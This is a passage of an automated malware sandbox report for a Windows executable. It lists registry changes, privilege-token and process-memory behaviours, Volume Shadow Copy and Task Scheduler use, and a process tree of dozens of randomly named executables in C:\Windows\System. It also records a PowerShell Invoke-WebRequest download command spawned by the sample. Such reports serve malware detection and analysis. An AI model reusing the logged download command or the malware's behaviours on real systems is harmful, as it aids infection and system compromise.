| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "3095" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13217" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "56" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "3095" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "56" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "3047" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoftwindows.client.cbs | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "2986" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "3047" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\NumberOfSubdomains = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "2986" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\ = "0" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\ = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoftwindows.client.cbs\ = "0" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "3095" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1696768468-2170909707-4198977321-1000\{5BF1EC3C-BE4D-40E6-A7B2-F6CC9537EAC7} | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13217" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13184" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13184" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2986" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13184" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\Total = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13217" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133586183531326085" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "23" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe
"C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
C:\Windows\System\rIHUzjR.exe
C:\Windows\System\rIHUzjR.exe
C:\Windows\System\kkkADGh.exe
C:\Windows\System\kkkADGh.exe
C:\Windows\System\jHIheIs.exe
C:\Windows\System\jHIheIs.exe
C:\Windows\System\wOweGKh.exe
C:\Windows\System\wOweGKh.exe
C:\Windows\System\WSUEKHv.exe
C:\Windows\System\WSUEKHv.exe
C:\Windows\System\ZmXbfSK.exe
C:\Windows\System\ZmXbfSK.exe
C:\Windows\System\QEeNVJt.exe
C:\Windows\System\QEeNVJt.exe
C:\Windows\System\PvNLrTt.exe
C:\Windows\System\PvNLrTt.exe
C:\Windows\System\BxRzyat.exe
C:\Windows\System\BxRzyat.exe
C:\Windows\System\pfnzGYL.exe
C:\Windows\System\pfnzGYL.exe
C:\Windows\System\ueTiTDS.exe
C:\Windows\System\ueTiTDS.exe
C:\Windows\System\jafiJAs.exe
C:\Windows\System\jafiJAs.exe
C:\Windows\System\maJhowZ.exe
C:\Windows\System\maJhowZ.exe
C:\Windows\System\ptmFYXx.exe
C:\Windows\System\ptmFYXx.exe
C:\Windows\System\GInjOPW.exe
C:\Windows\System\GInjOPW.exe
C:\Windows\System\AxuWouK.exe
C:\Windows\System\AxuWouK.exe
C:\Windows\System\Egkhrwg.exe
C:\Windows\System\Egkhrwg.exe
C:\Windows\System\KQzUusT.exe
C:\Windows\System\KQzUusT.exe
C:\Windows\System\HiuZIki.exe
C:\Windows\System\HiuZIki.exe
C:\Windows\System\ANaXDvt.exe
C:\Windows\System\ANaXDvt.exe
C:\Windows\System\yCEWCAA.exe
C:\Windows\System\yCEWCAA.exe
C:\Windows\System\cLpJtRS.exe
C:\Windows\System\cLpJtRS.exe
C:\Windows\System\pZgAJbz.exe
C:\Windows\System\pZgAJbz.exe
C:\Windows\System\AxySaAu.exe
C:\Windows\System\AxySaAu.exe
C:\Windows\System\oViuURl.exe
C:\Windows\System\oViuURl.exe
C:\Windows\System\IIkYsIm.exe
C:\Windows\System\IIkYsIm.exe
C:\Windows\System\HDSFvmT.exe
C:\Windows\System\HDSFvmT.exe
C:\Windows\System\EskKmGW.exe
C:\Windows\System\EskKmGW.exe
C:\Windows\System\QdTxhQw.exe
C:\Windows\System\QdTxhQw.exe
C:\Windows\System\DumQgKv.exe
C:\Windows\System\DumQgKv.exe
C:\Windows\System\rmgYXhH.exe
C:\Windows\System\rmgYXhH.exe
C:\Windows\System\WjLookJ.exe
C:\Windows\System\WjLookJ.exe
C:\Windows\System\AyqupJG.exe
C:\Windows\System\AyqupJG.exe
C:\Windows\System\saiGnnk.exe
C:\Windows\System\saiGnnk.exe
C:\Windows\System\YleMOUI.exe
C:\Windows\System\YleMOUI.exe
C:\Windows\System\ccgIqTQ.exe
C:\Windows\System\ccgIqTQ.exe
C:\Windows\System\zVNLUhX.exe
C:\Windows\System\zVNLUhX.exe
C:\Windows\System\oytZsbW.exe
C:\Windows\System\oytZsbW.exe
C:\Windows\System\QoGAZoL.exe
C:\Windows\System\QoGAZoL.exe
C:\Windows\System\FLJQPtS.exe
C:\Windows\System\FLJQPtS.exe
C:\Windows\System\VaCnLgP.exe
C:\Windows\System\VaCnLgP.exe
C:\Windows\System\FiTEnxR.exe
C:\Windows\System\FiTEnxR.exe
C:\Windows\System\qCpDFWU.exe
C:\Windows\System\qCpDFWU.exe
C:\Windows\System\IwQhbgv.exe
C:\Windows\System\IwQhbgv.exe
C:\Windows\System\aAbDpdw.exe
C:\Windows\System\aAbDpdw.exe
C:\Windows\System\CjcXzQD.exe
C:\Windows\System\CjcXzQD.exe
C:\Windows\System\pnxZmZH.exe
C:\Windows\System\pnxZmZH.exe
C:\Windows\System\UbIpcMZ.exe
C:\Windows\System\UbIpcMZ.exe
C:\Windows\System\VqdGqkR.exe
C:\Windows\System\VqdGqkR.exe
C:\Windows\System\skzacKR.exe
C:\Windows\System\skzacKR.exe
C:\Windows\System\uCQISgs.exe
C:\Windows\System\uCQISgs.exe
C:\Windows\System\yMXWWFo.exe
C:\Windows\System\yMXWWFo.exe
C:\Windows\System\SWnrmWT.exe
C:\Windows\System\SWnrmWT.exe
C:\Windows\System\qtPXYrA.exe
C:\Windows\System\qtPXYrA.exe
C:\Windows\System\UHmXkDd.exe
C:\Windows\System\UHmXkDd.exe
C:\Windows\System\ikbMusT.exe
C:\Windows\System\ikbMusT.exe
C:\Windows\System\CCbdvRI.exe
C:\Windows\System\CCbdvRI.exe
C:\Windows\System\IQrzVSZ.exe
C:\Windows\System\IQrzVSZ.exe
C:\Windows\System\GogZPsA.exe
C:\Windows\System\GogZPsA.exe
C:\Windows\System\ZVEEvZl.exe
C:\Windows\System\ZVEEvZl.exe
C:\Windows\System\mqmLcSy.exe
C:\Windows\System\mqmLcSy.exe
C:\Windows\System\uArEJRu.exe
C:\Windows\System\uArEJRu.exe
C:\Windows\System\nMmOXJy.exe
C:\Windows\System\nMmOXJy.exe
C:\Windows\System\NhxCPsq.exe
C:\Windows\System\NhxCPsq.exe
C:\Windows\System\XpvNgPt.exe
C:\Windows\System\XpvNgPt.exe
C:\Windows\System\aYDiiti.exe
C:\Windows\System\aYDiiti.exe
C:\Windows\System\JkBlwix.exe
C:\Windows\System\JkBlwix.exe
C:\Windows\System\VVgSVdg.exe
C:\Windows\System\VVgSVdg.exe
C:\Windows\System\gkwJSyK.exe
C:\Windows\System\gkwJSyK.exe
C:\Windows\System\PBvXstd.exe
C:\Windows\System\PBvXstd.exe
C:\Windows\System\ZplnjHS.exe
C:\Windows\System\ZplnjHS.exe
C:\Windows\System\EiWWhVp.exe
C:\Windows\System\EiWWhVp.exe
C:\Windows\System\ElRbMSa.exe
C:\Windows\System\ElRbMSa.exe
C:\Windows\System\XDoxGWt.exe
C:\Windows\System\XDoxGWt.exe
C:\Windows\System\FkMfNUg.exe
C:\Windows\System\FkMfNUg.exe
C:\Windows\System\gUgtsCc.exe
C:\Windows\System\gUgtsCc.exe
C:\Windows\System\JeTXljB.exe
C:\Windows\System\JeTXljB.exe
C:\Windows\System\sDaFqkb.exe
C:\Windows\System\sDaFqkb.exe
C:\Windows\System\qZzowHO.exe
C:\Windows\System\qZzowHO.exe
C:\Windows\System\GCzTPYJ.exe
C:\Windows\System\GCzTPYJ.exe
C:\Windows\System\CLORjrm.exe
C:\Windows\System\CLORjrm.exe
C:\Windows\System\yaDXLEN.exe
C:\Windows\System\yaDXLEN.exe
C:\Windows\System\YYhYZth.exe
C:\Windows\System\YYhYZth.exe
C:\Windows\System\srokxhz.exe
C:\Windows\System\srokxhz.exe
C:\Windows\System\nkusNUB.exe
C:\Windows\System\nkusNUB.exe
C:\Windows\System\iruQlon.exe
C:\Windows\System\iruQlon.exe
C:\Windows\System\VstOqVu.exe
C:\Windows\System\VstOqVu.exe
C:\Windows\System\klMnmdk.exe
C:\Windows\System\klMnmdk.exe
C:\Windows\System\hlfIrbn.exe
C:\Windows\System\hlfIrbn.exe
C:\Windows\System\rNCtWrk.exe
C:\Windows\System\rNCtWrk.exe
C:\Windows\System\RnSGdXx.exe
C:\Windows\System\RnSGdXx.exe
C:\Windows\System\WjEudfx.exe
C:\Windows\System\WjEudfx.exe
C:\Windows\System\NQGcMQN.exe
C:\Windows\System\NQGcMQN.exe
C:\Windows\System\EsXtAym.exe
C:\Windows\System\EsXtAym.exe
C:\Windows\System\imGuQDx.exe
C:\Windows\System\imGuQDx.exe
C:\Windows\System\YheVfWH.exe
C:\Windows\System\YheVfWH.exe
C:\Windows\System\mfcIPFI.exe
C:\Windows\System\mfcIPFI.exe
C:\Windows\System\LkafMBa.exe
C:\Windows\System\LkafMBa.exe
C:\Windows\System\FvVMMiz.exe
C:\Windows\System\FvVMMiz.exe
C:\Windows\System\FkCYicX.exe
